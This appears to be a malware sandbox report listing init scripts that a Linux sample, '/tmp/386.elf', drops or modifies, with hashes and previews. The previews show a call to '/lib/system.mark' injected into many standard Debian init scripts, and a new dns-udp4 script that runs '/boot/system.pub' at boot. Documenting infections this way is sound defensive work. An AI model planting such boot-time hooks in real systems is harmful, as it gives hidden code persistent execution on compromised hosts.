SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
MD5:	F59810FCEAD6967D3484941B757C5D9F
SHA1:	8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
SHA-256:	3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
SHA-512:	E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.162273569946851
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
MD5:	4D657844653E6118D801763C22C19937
SHA1:	6E7F91D90BAF86647698FA87FACD293CB345CF8B
SHA-256:	DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
SHA-512:	7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.228297603931064
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
MD5:	2A2270B6CC5B1BB95B8ED17ACC2C088E
SHA1:	E64F610A9E1145F5C930A7B2D1B31D9D301DF237
SHA-256:	A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
SHA-512:	4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.146376682341581
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
MD5:	DA422CE81DD723C1511C06DA133FC27A
SHA1:	BBC3D860F2A391DCA48430C7C683D101463FA364
SHA-256:	1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
SHA-512:	A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.122590071157076
Encrypted:	false
SSDEEP:	96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
MD5:	E85B436BDC8D0D1FAB58603A43BD7F55
SHA1:	53A674DE137A91FF396048EF8F09B0F306397136
SHA-256:	0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
SHA-512:	8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/dns-udp4

Download File

Process:	/tmp/386.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.03458455286979
Encrypted:	false
SSDEEP:	3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
MD5:	2C9C7188232B53D595FD0541654BBCAC
SHA1:	7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
SHA-256:	C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
SHA-512:	CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0

/etc/init.d/gdm3

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.045804889605048
Encrypted:	false
SSDEEP:	48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
MD5:	979319372C9DA2093D245E5755FF36A6
SHA1:	9B5DD36873636794D6AE07792E7D4D9DED2C2489
SHA-256:	28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
SHA-512:	89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.2621448888959215
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
MD5:	A5AD832AE20F98254D6020CE444485FD
SHA1:	43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
SHA-256:	52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
SHA-512:	A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1533815522152295
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
MD5:	D79E755001A5DB9E20CEDB6C961025F2
SHA1:	EDC19EC928BF4DAD45DA256670D819453BB58AE8
SHA-256:	11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
SHA-512:	4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.999484335058729
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
MD5:	264DF0349838878E6A342635B4C6AAC6
SHA1:	FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
SHA-256:	CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
SHA-512:	A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.973705475535796
Encrypted:	false
SSDEEP:	24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
MD5:	17D9A0A3EA1CD82B2A6A20441C80F070
SHA1:	620A0F1B6910A8599B70373E1395E7C72D31DFD1
SHA-256:	8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
SHA-512:	0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.312093274159983
Encrypted:	false
SSDEEP:	48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
MD5:	4C516D25550878CE2CE024B6E97105DB
SHA1:	812E84ACA9890069BF1DBDEF175789DB8792F63D
SHA-256:	DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
SHA-512:	608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.911228479541638
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
MD5:	17D2C5E15246E822C28D957F063D1A16
SHA1:	387E38EC5877238778209A18EA0D930709E7A603
SHA-256:	25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
SHA-512:	0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.284950933277381
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
MD5:	8134B3B7E43D4BBE6C1F3E7C7C73A7ED
SHA1:	156CCD1CF7176156A0AD84CDEB5B53868C81712F
SHA-256:	379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
SHA-512:	7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.104600839303824
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
MD5:	4F5481561C2CB414FA79507BA03FDEF7
SHA1:	974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
SHA-256:	B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
SHA-512:	20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.317046519159889
Encrypted:	false
SSDEEP:	12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
MD5:	1BB719CD6C1AFE11FFAA22E457222B8B
SHA1:	8C6D68B8CFD06AD81813E9568F61C029F12D258A
SHA-256:	282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
SHA-512:	23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.328823038467521
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
MD5:	70A5C40B509AEA9932FA851AD70ACB57
SHA1:	463305EFCF59020D68D1E2111298EE20612D0D73
SHA-256:	04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
SHA-512:	E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.319082661316184
Encrypted:	false
SSDEEP:	48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
MD5:	FA339A7172040C330DC30E65E29BE1D1
SHA1:	F558AD0D3435E5F9E486820B9844031CF83450B1
